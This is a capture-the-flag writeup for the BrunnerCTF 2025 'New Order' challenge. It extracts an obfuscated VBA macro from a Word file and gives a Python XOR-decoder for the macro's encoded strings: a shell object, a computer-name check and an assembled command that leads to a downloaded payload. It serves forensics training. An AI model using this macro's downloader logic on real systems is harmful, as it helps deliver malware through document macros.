CTFtime.org / BrunnerCTF 2025 / New Order / Writeup

1. unzip the doc file
2. `$ olevba word/vbaProject.bin --deobf`
3. take this vba script and deobfuscate it
```python
def decode(keys, vals):
return ''.join(chr(v ^ k) for k, v in zip(keys, vals))

# Shell object
shell = decode([56, (((107 - 41) + 27) ^ (231 - 14)), (17 + (294 - 134)), 225, 40, (157 ^ 72), ((52 - 24) ^ (15 + 34)), 242, (151 ^ 101), ((85 + (13 - 0)) ^ (11 - 3)), 242, (449 - 215), (34 ^ (298 - 142))], [111, (371 - 156), 210, (289 - 142), ((26 - 5) + (86 - 42)), (76 ^ 233), (24 + (82 - 17)), ((82 - 36) ^ 242), ((186 - 87) + 62), 2, 151, 134, (420 - 210)])
print('Shell object:', shell)

# Computer system object
comp_sys = decode([(146 ^ 44), (34 + (241 - 97)), 53, ((78 - 17) + 106), (284 - 115), (186 - 53), ((36 + (21 - 1)) ^ 192), (8 + 47), (74 - 12), (125 ^ (19 + (381 - 148))), (51 + (47 - 8)), (465 - 218), (76 + 53), ((126 - 56) + 24), (((0 - 0) + (1 - 0)) ^ 16)], [233, 225, (79 + (13 - 6)), (394 - 181), ((62 - 11) ^ 243), (229 + 16), (3 + (256 - 119)), ((2 + (2 - 1)) ^ (13 + (23 - 10))), 112, (115 ^ 151), (58 - 12), (120 ^ ((127 - 26) + (213 - 66))), 238, (44 - 0), (86 + 36)])
print('Computer system object:', comp_sys)

# Computer name check
check_name = decode([(237 - 21), 77, (158 - 6), 14, (75 - 15), (407 - 168), 133, 3, (246 - 117), ((142 - 16) + 24), ((93 + 93) ^ (34 + 53)), 7, (93 ^ (207 - 44)), (4 - 0), (114 ^ 235)], [156, 8, (110 + 93), (55 ^ (147 - 33)), (29 ^ 117), (250 - 90), 213, (45 ^ (4 - 1)), 182, (192 ^ 14), (316 - 149), (89 - 27), ((95 + 17) ^ (347 - 140)), 70, 218])
print('Check computer name:', check_name)

# kfawfa parts
kf1 = decode([115, (81 + 3), 96, (((138 - 54) + 1) ^ (98 - 45)), (68 + (83 - 28)), ((26 - 0) ^ 43), (88 ^ (13 - 6)), ((13 + 41) ^ (192 + 25)), (((2 - 1) + 2) ^ (74 + 83)), (139 ^ 62), (78 ^ 52), ((193 - 76) ^ 219), 54, ((279 - 79) + 27), (196 - 4)], [(((13 - 0) + 5) ^ (0 + 0)), (4 + 1), ((28 - 5) ^ ((2 - 0) + 51)), 83, 58, 121, 22, (51 ^ (114 + 43)), (103 ^ ((189 - 73) + 60)), (400 - 156), (36 + 20), (50 + 143), (86 ^ 33), (218 - 47), ((39 + 100) ^ 26)])
kf2 = decode([189, (4 ^ 45), (224 - 14), (23 + 148), (10 - 4), 188, 173, (55 ^ 74), (101 + 68), 156, (36 + (47 - 18)), (4 - 2), 123, (((18 - 0) + 15) ^ (71 + 167)), 134], [(425 - 173), (73 ^ 4), (80 + 67), ((71 + 24) ^ (182 + 0)), 113, (80 ^ (201 - 28)), 229, 48, (169 ^ (13 + (92 - 40))), ((19 + 17) ^ 247), 38, 67, (17 - 4), 142, 197])
kf3 = decode([(((4 - 2) + (0 - 0)) ^ (0 + 0)), (67 ^ 21), 51, ((43 + 82) ^ 149), ((0 + 6) ^ (15 + 9)), (71 + 133), ((24 + 7) ^ (186 - 50)), 236, 71, 84, (114 ^ (267 - 75)), (107 + (114 - 54)), (21 ^ (134 - 29)), (139 - 65), (159 ^ (21 + 62))], [(32 + (37 - 11)), ((4 + 16) ^ (1 + (3 - 1))), (124 - 43), (248 - 105), 92, (159 + (39 - 12)), (62 + (207 - 55)), ((14 + 69) ^ 248), (32 + (24 - 12)), 21, 209, (340 - 132), (11 ^ 53), (99 ^ ((22 - 2) + 8)), (120 ^ 245)])
kf4 = decode([97, (((52 - 23) + 16) ^ 213), (8 ^ 17), ((220 - 100) + 53), (19 + 66), (((7 - 2) + (12 - 5)) ^ (35 - 5)), 254, 254, (87 + 150), (394 - 197), (100 + 26), 113, 160, (428 - 193), (156 + 56)], [(12 + 22), 200, (71 + (27 - 10)), (94 + 110), 20, 80, (207 - 57), (320 - 129), (147 + 23), (((17 - 5) + (18 - 8)) ^ 164), (39 ^ ((21 - 10) + (26 - 13))), 19, 225, (135 + (45 - 10)), (147 + 13)])
kf5 = decode([27, 179, 206, (((94 - 8) + 13) ^ (256 - 110)), (294 - 85), (60 - 21), (13 + (102 - 45)), (79 + (1 - 0)), (52 + 54), 72, 213, (173 + 13), (53 + 20), (180 + 8), (29 ^ (136 + 71))], [(63 + 27), 244, (107 ^ 252), 176, 136, (137 - 19), (4 ^ (0 - 0)), (104 - 45), ((3 + (3 - 0)) ^ 45), (2 ^ (21 - 7)), 178, ((13 + 43) ^ (253 - 58)), (4 ^ (2 - 1)), ((131 - 63) + (216 - 65)), (127 + 17)])
kf6 = decode([((0 + 8) ^ 108), (211 - 90), (264 - 127), (9 - 1), (39 + (14 - 4)), 66, 14, ((169 + (16 - 6)) ^ (169 - 64)), 55, (45 - 9), 113, 127, (68 + (241 - 71)), (61 - 10), 115], [18, 56, 206, 127, ((30 + (100 - 24)) ^ (29 - 3)), (11 + (30 - 3)), 95, 152, (172 - 82), (16 ^ ((7 - 0) + 110)), 50, (67 ^ 12), (47 + (248 - 120)), 80, 4])
kf7 = decode([(7 ^ 18), (18 ^ (31 + 170)), (0 + 5), (113 - 1), ((34 - 1) ^ (195 - 75)), 175, ((80 - 13) + 74), (58 + 104), (240 - 79), 189, (0 ^ 7), (24 + (28 - 5)), ((49 - 22) ^ 91), 148, 13], [87, 179, (84 - 16), (56 - 1), ((57 + 27) ^ 57), (399 - 161), (257 - 42), (434 - 207), (233 - 9), ((60 - 25) ^ ((83 - 32) + 184)), 70, (68 + 35), 35, (((3 - 1) + (10 - 5)) ^ (400 - 190)), (76 ^ (23 + (18 - 6)))])
kf8 = decode([38, (79 + 151), (((15 - 7) + 12) ^ 46), 102, (0 ^ (0 - 0)), (112 ^ ((20 - 6) + 1)), (98 + 43), 211, (221 - 54), (54 - 16), ((0 + 61) ^ 219), (((9 - 2) + (8 - 1)) ^ (76 - 38)), ((32 - 14) + 104), 159, ((218 - 31) ^ (145 - 55))], [81, (17 ^ ((107 - 22) + 96)), 67, 39, (5 ^ 66), ((8 - 3) ^ (10 - 1)), ((214 - 92) + 82), (12 + (130 - 5)), (34 + 212), ((84 - 14) + 30), 159, (100 ^ ((23 - 10) + 0)), (0 ^ 50), (((95 - 44) + 0) ^ (223 + 2)), ((36 + 10) ^ (8 + 134))])
kf9 = decode([(4 ^ (19 - 1)), ((0 - 0) + 6), ((6 - 3) + 133), 190, (431 - 178), (((39 - 0) + (27 - 12)) ^ 213), 24, (8 - 0), 171, (157 ^ 60), 172, 174, 16, (51 ^ (88 + 32)), (86 - 4)], [90, 97, 202, (179 + (67 - 33)), (366 - 178), (180 - 16), 77, (43 + 30), 207, (34 ^ 228), (55 + (183 - 1)), 201, (((38 - 9) + 37) ^ 19), 3, 37])
kf10 = decode([146, (425 - 174), 232, ((150 - 70) + 30), (33 - 8), ((69 - 20) + 79), (24 - 8), (162 - 40), (72 - 29), 74, (46 ^ 230), 46, 161], [((325 - 154) ^ (47 + 73)), (((18 - 7) + 30) ^ (259 - 104)), ((32 - 2) + 139), 44, 105, ((37 - 17) + 173), (42 + (82 - 37)), (36 ^ ((1 - 0) + 10)), ((65 - 31) + 72), (((6 - 2) + 2) ^ (0 + (60 - 19))), 137, ((22 - 4) ^ (7 + 118)), 156])
kfawfa = kf1 + kf2 + kf3 + kf4 + kf5 + kf6 + kf7 + kf8 + kf9 + kf10
print('kfawfa:', kfawfa)

# Command parts
pre1 = decode([39, 204, 252, ((82 - 29) ^ 234), (50 ^ (161 - 66)), (179 ^ 12), (10 ^ 126), 220, 244, ((385 - 185) + 41), (((147 - 64) + 68) ^ 70), ((45 - 5) + 27), (306 - 90), 130, ((15 + 28) ^ 106)], [87, (129 ^ (29 + (7 - 2))), (266 - 127), 186, ((11 - 0) + (36 - 16)), (234 - 30), 28, (117 + 68), (5 ^ 157), 157, ((160 - 19) + 114), ((36 - 1) ^ (1 + 4)), ((27 - 11) ^ (46 + (132 - 2))), (119 ^ 144), (44 ^ (64 + 13))])
pre2 = decode([((244 - 85) ^ (31 + 69)), 140, (196 + 20), 199, 241], [214, (116 + 117), (59 ^ (238 - 97)), (292 - 128), 209])
post1 = decode([(2 ^ ((0 - 0) + 0)), ((59 - 2) + 156)], [((15 - 7) + 24), (((2 - 1) + 3) ^ 243)])
post2 = decode([(175 + 45), (220 - 45)], [254, (210 - 69)])
command = pre1 + pre2 + kfawfa + post1 + post2
print('Command:', command)
```
4. from the result decode base64 and find a link
5. download the content of this link and find another base64, which while decoding you can notice the flag

Original writeup (https://github.com/juke-33/Write-ups/tree/main/BrunnerCTF%202025).

New Order

Comments

Sign in with